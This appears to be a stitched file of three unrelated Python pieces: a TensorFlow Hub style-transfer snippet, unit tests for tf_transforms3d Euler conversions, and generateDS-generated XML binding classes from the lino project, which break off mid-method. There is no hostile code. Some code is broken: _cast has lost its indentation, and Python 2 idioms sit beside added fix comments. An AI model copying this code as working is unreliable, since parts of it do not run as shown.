hub_handle = 'https://tfhub.dev/google/magenta/arbitrary-image-stylization-v1-256/2'
hub_module = hub.load(hub_handle)
# Stylize content image with given style image.
# This is pretty fast within a few milliseconds on a GPU.
outputs = hub_module(tf.constant(content_image), tf.constant(style_image))
stylized_image = outputs[0]
# Visualize input images and the generated stylized image.
show_n([content_image, style_image, stylized_image], titles=['Original content image', 'Style image', 'Stylized image'])
#Done, enjoy your stylized image
|
import sys
sys.path.insert(0, './../')
import unittest
import transforms3d
import numpy as np
import numpy.random as rnd
import tensorflow as tf
import math as m
import tf_transforms3d.euler as ELR
class TestEuler(unittest.TestCase):
    """Checks tf_transforms3d.euler against the reference transforms3d
    implementation on batches of random Euler angles ('sxyz' convention)."""

    def test_euler2quat(self):
        # Random angles in [-pi, pi) per axis.
        batchsize = 1024
        euler = (rnd.random(size=(batchsize, 3)) - 0.5) * 2 * m.pi
        euler = euler.astype('float32')
        Q_np = []
        for i in range(batchsize):
            Q = transforms3d.euler.euler2quat(*euler[i], axes='sxyz')
            Q_np.append(Q)
        Q_np = np.array(Q_np)
        Q_tf = ELR.euler2quat(euler)
        Dif = np.abs(Q_np - Q_tf)
        # Quaternions must be unit length and match the reference values.
        N = np.linalg.norm(Q_tf, axis=1)
        self.assertAlmostEqual(1., np.min(N), places=4)
        self.assertAlmostEqual(1., np.max(N), places=4)
        self.assertAlmostEqual(0., np.max(Dif), places=5)

    def test_euler2mat(self):
        batchsize = 1024
        euler = (rnd.random(size=(batchsize, 3)) - 0.5) * 2 * m.pi
        euler = euler.astype('float32')
        R_np = []
        for i in range(batchsize):
            R = transforms3d.euler.euler2mat(*euler[i], axes='sxyz')
            R_np.append(R)
        R_np = np.array(R_np)
        R_tf = ELR.euler2mat(euler)
        Dif = np.abs(R_np - R_tf)
        # BUG FIX: removed a stray `ELR.mat2euler(R_tf)` call whose result
        # was discarded; it only added computation without asserting anything.
        self.assertAlmostEqual(0., np.max(Dif), places=5)

    def test_mat2euler(self):
        batchsize = 1024
        euler = (rnd.random(size=(batchsize, 3)) - 0.5) * 2 * m.pi
        euler = euler.astype('float32')
        R_np = []
        for i in range(batchsize):
            R = transforms3d.euler.euler2mat(*euler[i], axes='sxyz')
            R_np.append(R)
        R_np = np.array(R_np)
        R_tf = ELR.euler2mat(euler)
        Dif = np.abs(R_np - R_tf)
        self.assertAlmostEqual(0., np.max(Dif), places=5)
        # Round-trip: recovered angles must agree with the reference mat2euler.
        euler_tf = ELR.mat2euler(R_tf)
        euler_np = []
        for i in range(batchsize):
            ax, ay, az = transforms3d.euler.mat2euler(R_np[i])
            euler_np.append((ax, ay, az))
        euler_np = np.array(euler_np, dtype=np.float32)
        Dif = np.abs(euler_np - euler_tf)
        self.assertAlmostEqual(0., np.max(Dif), places=5)

    def test_quat2euler(self):
        batchsize = 1024
        euler = (rnd.random(size=(batchsize, 3)) - 0.5) * 2 * m.pi
        Q_np = []
        for i in range(batchsize):
            Q = transforms3d.euler.euler2quat(*euler[i], axes='sxyz')
            Q_np.append(Q)
        Q_np = np.array(Q_np, dtype=np.float32)
        euler_np = []
        for i in range(batchsize):
            eul = transforms3d.euler.quat2euler(Q_np[i])
            euler_np.append(eul)
        euler_np = np.array(euler_np, dtype=np.float32)
        euler_tf = ELR.quat2euler(Q_np)
        Dif = np.abs(euler_tf - euler_np)
        self.assertAlmostEqual(0., np.max(Dif), places=4)
if __name__ == '__main__':
    # Run the whole TestEuler suite when executed as a script.
    unittest.main()
|
# Repository: NewRGB/lino
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Mon Oct 03 15:32:11 2011 by generateDS.py version 2.6a.
#
import sys
import getopt
import re as re_
etree_ = None  # bound below to whichever ElementTree implementation imports
Verbose_import_ = False  # set True to print which XML backend was selected
# Enumeration of the possible XML parser backends.
(XMLParser_import_none, XMLParser_import_lxml,
 XMLParser_import_elementtree
 ) = range(3)
XMLParser_import_library = None  # set by the import chain below
# Select the best available ElementTree implementation, preferring lxml,
# then the C-accelerated stdlib tree, then pure-Python fallbacks.
try:
    # lxml
    from lxml import etree as etree_
    XMLParser_import_library = XMLParser_import_lxml
    if Verbose_import_:
        print("running with lxml.etree")
except ImportError:
    try:
        # cElementTree from Python 2.5+
        import xml.etree.cElementTree as etree_
        XMLParser_import_library = XMLParser_import_elementtree
        if Verbose_import_:
            print("running with cElementTree on Python 2.5+")
    except ImportError:
        try:
            # ElementTree from Python 2.5+
            import xml.etree.ElementTree as etree_
            XMLParser_import_library = XMLParser_import_elementtree
            if Verbose_import_:
                print("running with ElementTree on Python 2.5+")
        except ImportError:
            try:
                # normal cElementTree install
                import cElementTree as etree_
                XMLParser_import_library = XMLParser_import_elementtree
                if Verbose_import_:
                    print("running with cElementTree")
            except ImportError:
                try:
                    # normal ElementTree install
                    import elementtree.ElementTree as etree_
                    XMLParser_import_library = XMLParser_import_elementtree
                    if Verbose_import_:
                        print("running with ElementTree")
                except ImportError:
                    raise ImportError(
                        "Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
    """Parse an XML document with the selected backend.

    When the lxml backend is active and the caller did not supply a parser,
    force lxml's ElementTree-compatible parser so that, e.g., comments are
    ignored.
    """
    using_lxml = XMLParser_import_library == XMLParser_import_lxml
    if using_lxml and 'parser' not in kwargs:
        kwargs['parser'] = etree_.ETCompatXMLParser()
    return etree_.parse(*args, **kwargs)
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
    from generatedssuper import GeneratedsSuper
except ImportError:
    # Fallback base class used when the project does not provide its own
    # generatedssuper module. It supplies the gds_format_* / gds_validate_*
    # helpers the generated classes below rely on.
    # FIX: replaced the legacy `except ImportError, exp` comma syntax with
    # plain `except ImportError` -- valid on Python 2.6+ and required on
    # Python 3; the bound exception object was never used.
    class GeneratedsSuper(object):

        def gds_format_string(self, input_data, input_name=''):
            return input_data

        def gds_validate_string(self, input_data, node, input_name=''):
            return input_data

        def gds_format_integer(self, input_data, input_name=''):
            return '%d' % input_data

        def gds_validate_integer(self, input_data, node, input_name=''):
            return input_data

        def gds_format_integer_list(self, input_data, input_name=''):
            return '%s' % input_data

        def gds_validate_integer_list(self, input_data, node, input_name=''):
            # NOTE(review): probes with float(), so e.g. '1.5' passes the
            # "integers" check -- kept to match upstream generateDS output.
            values = input_data.split()
            for value in values:
                try:
                    fvalue = float(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of integers')
            return input_data

        def gds_format_float(self, input_data, input_name=''):
            return '%f' % input_data

        def gds_validate_float(self, input_data, node, input_name=''):
            return input_data

        def gds_format_float_list(self, input_data, input_name=''):
            return '%s' % input_data

        def gds_validate_float_list(self, input_data, node, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    fvalue = float(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of floats')
            return input_data

        def gds_format_double(self, input_data, input_name=''):
            return '%e' % input_data

        def gds_validate_double(self, input_data, node, input_name=''):
            return input_data

        def gds_format_double_list(self, input_data, input_name=''):
            return '%s' % input_data

        def gds_validate_double_list(self, input_data, node, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    fvalue = float(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of doubles')
            return input_data

        def gds_format_boolean(self, input_data, input_name=''):
            return '%s' % input_data

        def gds_validate_boolean(self, input_data, node, input_name=''):
            return input_data

        def gds_format_boolean_list(self, input_data, input_name=''):
            return '%s' % input_data

        def gds_validate_boolean_list(self, input_data, node, input_name=''):
            values = input_data.split()
            for value in values:
                if value not in ('true', '1', 'false', '0', ):
                    raise_parse_error(
                        node, 'Requires sequence of booleans ("true", "1", "false", "0")')
            return input_data

        def gds_str_lower(self, instring):
            return instring.lower()

        def get_path_(self, node):
            # Build an XPath-like path from the root down to `node`.
            path_list = []
            self.get_path_list_(node, path_list)
            path_list.reverse()
            path = '/'.join(path_list)
            return path
        Tag_strip_pattern_ = re_.compile(r'\{.*\}')

        def get_path_list_(self, node, path_list):
            # Walk ancestors via getparent() (lxml-only), collecting tag names.
            if node is None:
                return
            tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
            if tag:
                path_list.append(tag)
            self.get_path_list_(node.getparent(), path_list)

        def get_class_obj_(self, node, default_class=None):
            # Resolve an xsi:type attribute to a generated class, if present.
            class_obj1 = default_class
            if 'xsi' in node.nsmap:
                classname = node.get('{%s}type' % node.nsmap['xsi'])
                if classname is not None:
                    names = classname.split(':')
                    if len(names) == 2:
                        classname = names[1]
                    class_obj2 = globals().get(classname)
                    if class_obj2 is not None:
                        class_obj1 = class_obj2
            return class_obj1
        # fix_any

        def gds_build_any(self, node, type_name=None):
            return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
# ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
# exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'  # encoding used when serializing text content
Tag_pattern_ = re_.compile(r'({.*})?(.*)')  # splits '{namespace}tag' into groups
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")  # collapses runs of whitespace
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')  # extracts namespace and tag
#
# Support/utility functions.
#
def showIndent(outfile, level):
    """Write one space of indentation per nesting level.

    NOTE(review): upstream generateDS writes four spaces per level; this
    file writes a single space -- confirm against the original source.
    """
    outfile.write(' ' * level)
def quote_xml(inStr):
    """Escape '&', '<' and '>' in *inStr* for use as XML text content.

    Returns '' for falsy input; non-string input is first converted with
    '%s' formatting.
    """
    if not inStr:
        return ''
    s1 = (isinstance(inStr, basestring) and inStr or
          '%s' % inStr)
    # BUG FIX: the escape targets had been corrupted into identity
    # replacements (e.g. "'&' -> '&'"); restore the proper XML entities
    # as emitted by generateDS.
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    return s1
def quote_attrib(inStr):
    """Escape *inStr* and wrap it in quotes for use as an XML attribute value.

    Prefers double quotes; falls back to single quotes when the value
    contains double quotes, and escapes double quotes as &quot; when both
    quote characters are present.
    """
    s1 = (isinstance(inStr, basestring) and inStr or
          '%s' % inStr)
    # BUG FIX: restore the XML entity replacements; they had been corrupted
    # into no-ops, and the &quot; literal below had been mangled into an
    # unterminated triple-quote (a syntax error).
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    if '"' in s1:
        if "'" in s1:
            s1 = '"%s"' % s1.replace('"', "&quot;")
        else:
            s1 = "'%s'" % s1
    else:
        s1 = '"%s"' % s1
    return s1
def quote_python(inStr):
    """Render *inStr* as a Python string literal.

    Uses single quotes when possible, otherwise double quotes (escaping any
    embedded double quotes); switches to the triple-quoted form when the
    value contains a newline.
    """
    text = inStr
    multiline = text.find('\n') != -1
    if "'" not in text:
        template = "'''%s'''" if multiline else "'%s'"
        return template % text
    if '"' in text:
        text = text.replace('"', '\\"')
    template = '"""%s"""' if multiline else '"%s"'
    return template % text
def get_all_text_(node):
    """Collect the node's own text plus the tail text of each direct child."""
    pieces = []
    if node.text is not None:
        pieces.append(node.text)
    pieces.extend(child.tail for child in node if child.tail is not None)
    return ''.join(pieces)
def find_attr_value_(attr_name, node):
    """Look up an attribute on *node*.

    A plain name is fetched directly; a 'prefix:name' form is resolved
    through the node's namespace map (``nsmap`` -- lxml nodes only) to a
    Clark-notation key. Returns None when the attribute is absent or the
    prefix cannot be resolved.
    """
    attrs = node.attrib
    parts = attr_name.split(':')
    if len(parts) == 1:
        return attrs.get(attr_name)
    if len(parts) == 2:
        prefix, name = parts
        namespace = node.nsmap.get(prefix)
        if namespace is not None:
            return attrs.get('{%s}%s' % (namespace, name, ))
    return None
class GDSParseError(Exception):
    """Raised when an XML document fails generateDS parsing/validation."""
    pass
def raise_parse_error(node, msg):
    """Raise GDSParseError for *node*, appending the element tag and -- when
    the lxml backend is active (it exposes ``sourceline``) -- the source
    line number."""
    if XMLParser_import_library == XMLParser_import_lxml:
        detail = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
    else:
        detail = '%s (element %s)' % (msg, node.tag, )
    raise GDSParseError(detail)
class MixedContainer:
    """Wrapper for one piece of mixed XML content (raw text, a simple typed
    value, or a nested complex object), tagged with category and content
    type constants."""
    # Constants for category:
    CategoryNone = 0
    CategoryText = 1
    CategorySimple = 2
    CategoryComplex = 3
    # Constants for content_type:
    TypeNone = 0
    TypeText = 1
    TypeString = 2
    TypeInteger = 3
    TypeFloat = 4
    TypeDecimal = 5
    TypeDouble = 6
    TypeBoolean = 7

    def __init__(self, category, content_type, name, value):
        self.category = category
        self.content_type = content_type
        self.name = name
        self.value = value

    def getCategory(self):
        return self.category

    def getContenttype(self, content_type):
        # NOTE(review): the content_type argument is ignored and the stored
        # value returned -- matches generateDS-generated code.
        return self.content_type

    def getValue(self):
        return self.value

    def getName(self):
        return self.name

    def export(self, outfile, level, name, namespace):
        # Serialize according to category; complex values delegate to the
        # nested object's own export().
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
                outfile.write(self.value)
        elif self.category == MixedContainer.CategorySimple:
            self.exportSimple(outfile, level, name)
        else:  # category == MixedContainer.CategoryComplex
            self.value.export(outfile, level, namespace, name)

    def exportSimple(self, outfile, level, name):
        # Write a simple typed value as <name>value</name>, formatted per type.
        if self.content_type == MixedContainer.TypeString:
            outfile.write('<%s>%s</%s>' % (self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeInteger or \
                self.content_type == MixedContainer.TypeBoolean:
            outfile.write('<%s>%d</%s>' % (self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeFloat or \
                self.content_type == MixedContainer.TypeDecimal:
            outfile.write('<%s>%f</%s>' % (self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeDouble:
            outfile.write('<%s>%g</%s>' % (self.name, self.value, self.name))

    def exportLiteral(self, outfile, level, name):
        # Emit Python-literal construction code for this container.
        if self.category == MixedContainer.CategoryText:
            showIndent(outfile, level)
            outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' %
                          (self.category, self.content_type, self.name, self.value))
        elif self.category == MixedContainer.CategorySimple:
            showIndent(outfile, level)
            outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' %
                          (self.category, self.content_type, self.name, self.value))
        else:  # category == MixedContainer.CategoryComplex
            showIndent(outfile, level)
            outfile.write('model_.MixedContainer(%d, %d, "%s",\n' %
                          (self.category, self.content_type, self.name,))
            self.value.exportLiteral(outfile, level + 1)
            showIndent(outfile, level)
            outfile.write(')\n')
class MemberSpec_(object):
    """Metadata describing one member of a generated class: its name, its
    schema data type (a single value or a chain), and a container flag."""

    def __init__(self, name='', data_type='', container=0):
        self.name = name
        self.data_type = data_type
        self.container = container

    def set_name(self, name):
        self.name = name

    def get_name(self):
        return self.name

    def set_data_type(self, data_type):
        self.data_type = data_type

    def get_data_type_chain(self):
        return self.data_type

    def get_data_type(self):
        """Return the effective data type: the last element of a type chain
        ('xs:string' for an empty chain), or the value itself otherwise."""
        if not isinstance(self.data_type, list):
            return self.data_type
        return self.data_type[-1] if len(self.data_type) > 0 else 'xs:string'

    def set_container(self, container):
        self.container = container

    def get_container(self):
        return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class ServiceRequestType(GeneratedsSuper):
    """A single request to a service; replace ``any_`` with the actual
    service request body."""
    subclass = None
    superclass = None

    def __init__(self, ServiceId=None, Version=None, any_=None):
        self.ServiceId = ServiceId
        self.Version = Version
        # fix_any
        self.any_ = any_

    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        if ServiceRequestType.subclass:
            return ServiceRequestType.subclass(*args_, **kwargs_)
        else:
            return ServiceRequestType(*args_, **kwargs_)
    factory = staticmethod(factory)

    def get_ServiceId(self):
        return self.ServiceId

    def set_ServiceId(self, ServiceId):
        self.ServiceId = ServiceId

    def get_Version(self):
        return self.Version

    def set_Version(self, Version):
        self.Version = Version
    # fix_any

    def get_any_(self):
        return self.any_

    def set_any_(self, any_):
        self.any_ = any_

    def export(self, outfile, level, namespace_='', name_='ServiceRequestType', namespacedef_=''):
        # Serialize this element (and its children) as XML to outfile.
        showIndent(outfile, level)
        outfile.write('<%s%s%s' %
                      (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed,
                              namespace_, name_='ServiceRequestType')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ServiceRequestType'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='ServiceRequestType', fromsubclass_=False):
        if self.ServiceId is not None:
            showIndent(outfile, level)
            outfile.write('<%sServiceId>%s</%sServiceId>\n' %
                          (namespace_, self.gds_format_string(quote_xml(self.ServiceId).encode(ExternalEncoding), input_name='ServiceId'), namespace_))
        if self.Version is not None:
            showIndent(outfile, level)
            outfile.write('<%sVersion>%s</%sVersion>\n' %
                          (namespace_, self.gds_format_string(quote_xml(self.Version).encode(ExternalEncoding), input_name='Version'), namespace_))
        # fix_any
        if self.any_:
            #~ self.any_.export(outfile, level, namespace_, name_='description', )
            self.any_.export(outfile, level, namespace_)

    def hasContent_(self):
        # NOTE(review): any_ is not considered here, so an instance with only
        # any_ set serializes as an empty element -- confirm intended.
        if (
            self.ServiceId is not None or
            self.Version is not None
        ):
            return True
        else:
            return False

    def exportLiteral(self, outfile, level, name_='ServiceRequestType'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        if self.ServiceId is not None:
            showIndent(outfile, level)
            outfile.write('ServiceId=%s,\n' %
                          quote_python(self.ServiceId).encode(ExternalEncoding))
        if self.Version is not None:
            showIndent(outfile, level)
            outfile.write('Version=%s,\n' %
                          quote_python(self.Version).encode(ExternalEncoding))

    def build(self, node):
        # Populate this object from an ElementTree/lxml node.
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'ServiceId':
            ServiceId_ = child_.text
            ServiceId_ = self.gds_validate_string(
                ServiceId_, node, 'ServiceId')
            self.ServiceId = ServiceId_
        elif nodeName_ == 'Version':
            Version_ = child_.text
            Version_ = self.gds_validate_string(Version_, node, 'Version')
            self.Version = Version_
        else:
            # NOTE(review): passes the parent `node` (not `child_`) to
            # gds_build_any -- matches the generated fix_any code; confirm.
            obj_ = self.gds_build_any(node, 'ServiceRequestType')
            self.set_any_(obj_)
# end class ServiceRequestType
class Version(GeneratedsSuper):
    """Version of the service request."""
    subclass = None
    superclass = None

    def __init__(self):
        pass

    def factory(*args_, **kwargs_):
        if Version.subclass:
            return Version.subclass(*args_, **kwargs_)
        else:
            return Version(*args_, **kwargs_)
    factory = staticmethod(factory)

    def export(self, outfile, level, namespace_='', name_='Version', namespacedef_=''):
        showIndent(outfile, level)
        outfile.write('<%s%s%s' %
                      (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(
            outfile, level, already_processed, namespace_, name_='Version')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='Version'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='Version', fromsubclass_=False):
        pass

    def hasContent_(self):
        # Empty-tuple condition (always False): Version never has content.
        if (
        ):
            return True
        else:
            return False

    def exportLiteral(self, outfile, level, name_='Version'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        pass

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class Version
class RequestContextType(GeneratedsSuper):
    """Context information regarding the request."""
    subclass = None
    superclass = None

    def __init__(self, AuthorizedUser=None, Message=None):
        self.AuthorizedUser = AuthorizedUser
        self.Message = Message

    def factory(*args_, **kwargs_):
        if RequestContextType.subclass:
            return RequestContextType.subclass(*args_, **kwargs_)
        else:
            return RequestContextType(*args_, **kwargs_)
    factory = staticmethod(factory)

    def get_AuthorizedUser(self):
        return self.AuthorizedUser

    def set_AuthorizedUser(self, AuthorizedUser):
        self.AuthorizedUser = AuthorizedUser

    def get_Message(self):
        return self.Message

    def set_Message(self, Message):
        self.Message = Message

    def export(self, outfile, level, namespace_='', name_='RequestContextType', namespacedef_=''):
        showIndent(outfile, level)
        outfile.write('<%s%s%s' %
                      (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed,
                              namespace_, name_='RequestContextType')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='RequestContextType'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='RequestContextType', fromsubclass_=False):
        # Child objects serialize themselves.
        if self.AuthorizedUser:
            self.AuthorizedUser.export(
                outfile, level, namespace_, name_='AuthorizedUser', )
        if self.Message:
            self.Message.export(outfile, level, namespace_, name_='Message')

    def hasContent_(self):
        if (
            self.AuthorizedUser is not None or
            self.Message is not None
        ):
            return True
        else:
            return False

    def exportLiteral(self, outfile, level, name_='RequestContextType'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        if self.AuthorizedUser is not None:
            showIndent(outfile, level)
            outfile.write('AuthorizedUser=model_.AuthorizedUserType(\n')
            self.AuthorizedUser.exportLiteral(
                outfile, level, name_='AuthorizedUser')
            showIndent(outfile, level)
            outfile.write('),\n')
        if self.Message is not None:
            showIndent(outfile, level)
            outfile.write('Message=model_.RequestMessageType(\n')
            self.Message.exportLiteral(outfile, level, name_='Message')
            showIndent(outfile, level)
            outfile.write('),\n')

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'AuthorizedUser':
            obj_ = AuthorizedUserType.factory()
            obj_.build(child_)
            self.set_AuthorizedUser(obj_)
        elif nodeName_ == 'Message':
            obj_ = RequestMessageType.factory()
            obj_.build(child_)
            self.set_Message(obj_)
# end class RequestContextType
class SSDNRequest(GeneratedsSuper):
    """Request sent to the CBSS."""
    subclass = None
    superclass = None

    def __init__(self, RequestContext=None, ServiceRequest=None):
        self.RequestContext = RequestContext
        # ServiceRequest is a repeating element; default to a fresh list.
        if ServiceRequest is None:
            self.ServiceRequest = []
        else:
            self.ServiceRequest = ServiceRequest

    def factory(*args_, **kwargs_):
        if SSDNRequest.subclass:
            return SSDNRequest.subclass(*args_, **kwargs_)
        else:
            return SSDNRequest(*args_, **kwargs_)
    factory = staticmethod(factory)

    def get_RequestContext(self):
        return self.RequestContext

    def set_RequestContext(self, RequestContext):
        self.RequestContext = RequestContext

    def get_ServiceRequest(self):
        return self.ServiceRequest

    def set_ServiceRequest(self, ServiceRequest):
        self.ServiceRequest = ServiceRequest

    def add_ServiceRequest(self, value):
        self.ServiceRequest.append(value)

    def insert_ServiceRequest(self, index, value):
        # NOTE(review): overwrites the element at `index` rather than
        # inserting -- matches generateDS's generated code.
        self.ServiceRequest[index] = value

    def export(self, outfile, level, namespace_='', name_='SSDNRequest', namespacedef_=''):
        showIndent(outfile, level)
        outfile.write('<%s%s%s' %
                      (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(
            outfile, level, already_processed, namespace_, name_='SSDNRequest')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='SSDNRequest'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='SSDNRequest', fromsubclass_=False):
        if self.RequestContext:
            self.RequestContext.export(
                outfile, level, namespace_, name_='RequestContext', )
        for ServiceRequest_ in self.ServiceRequest:
            ServiceRequest_.export(
                outfile, level, namespace_, name_='ServiceRequest')

    def hasContent_(self):
        if (
            self.RequestContext is not None or
            self.ServiceRequest
        ):
            return True
        else:
            return False

    def exportLiteral(self, outfile, level, name_='SSDNRequest'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)

    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass

    def exportLiteralChildren(self, outfile, level, name_):
        if self.RequestContext is not None:
            showIndent(outfile, level)
            outfile.write('RequestContext=model_.RequestContextType(\n')
            self.RequestContext.exportLiteral(
                outfile, level, name_='RequestContext')
            showIndent(outfile, level)
            outfile.write('),\n')
        # The ServiceRequest list is always emitted, even when empty.
        showIndent(outfile, level)
        outfile.write('ServiceRequest=[\n')
        level += 1
        for ServiceRequest_ in self.ServiceRequest:
            showIndent(outfile, level)
            outfile.write('model_.ServiceRequestType(\n')
            ServiceRequest_.exportLiteral(
                outfile, level, name_='ServiceRequestType')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')

    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)

    def buildAttributes(self, node, attrs, already_processed):
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'RequestContext':
            obj_ = RequestContextType.factory()
            obj_.build(child_)
            self.set_RequestContext(obj_)
        elif nodeName_ == 'ServiceRequest':
            obj_ = ServiceRequestType.factory()
            obj_.build(child_)
            self.ServiceRequest.append(obj_)
# end class SSDNRequest
class RequestMessageType(GeneratedsSuper):
    """Information about the message being sent, provided by the sender."""
    subclass = None
    superclass = None

    def __init__(self, Reference=None, TimeRequest=None):
        self.Reference = Reference
        self.TimeRequest = TimeRequest

    def factory(*args_, **kwargs_):
        if RequestMessageType.subclass:
            return RequestMessageType.subclass(*args_, **kwargs_)
        else:
            return RequestMessageType(*args_, **kwargs_)
    factory = staticmethod(factory)

    def get_Reference(self):
        return self.Reference

    def set_Reference(self, Reference):
        self.Reference = Reference

    def get_TimeRequest(self):
        return self.TimeRequest

    def set_TimeRequest(self, TimeRequest):
        self.TimeRequest = TimeRequest

    def validate_t_DateTimeUTC(self, value):
        # Validate type t_DateTimeUTC, a restriction on xs:string.
        # (No constraints implemented by the generator.)
        pass

    def export(self, outfile, level, namespace_='', name_='RequestMessageType', namespacedef_=''):
        showIndent(outfile, level)
        outfile.write('<%s%s%s' %
                      (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed,
                              namespace_, name_='RequestMessageType')
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')

    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='RequestMessageType'):
        pass

    def exportChildren(self, outfile, level, namespace_='', name_='RequestMessageType', fromsubclass_=False):
        if self.Reference is not None:
            showIndent(outfile, level)
            outfile.write('<%sReference>%s</%sReference>\n' %
                          (namespace_, self.gds_format_string(quote_xml(self.Reference).encode(ExternalEncoding), input_name='Reference'), namespace_))
        if self.TimeRequest is not None:
            showIndent(outfile, level)
            outfile.write('<%sTimeRequest>%s</%sTimeRequest>\n' %
                          (namespace_, self.gds_format_string(quote_xml(self.TimeRequest).encode(ExternalEncoding), input_name='TimeRequest'), namespace_))

    def hasContent_(self):
        if (
            self.Reference is not None or
            self.TimeRequest is not None
        ):
            return True
        else:
            return False

    def exportLiteral(self, outfile, level, name_='RequestMessageType'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
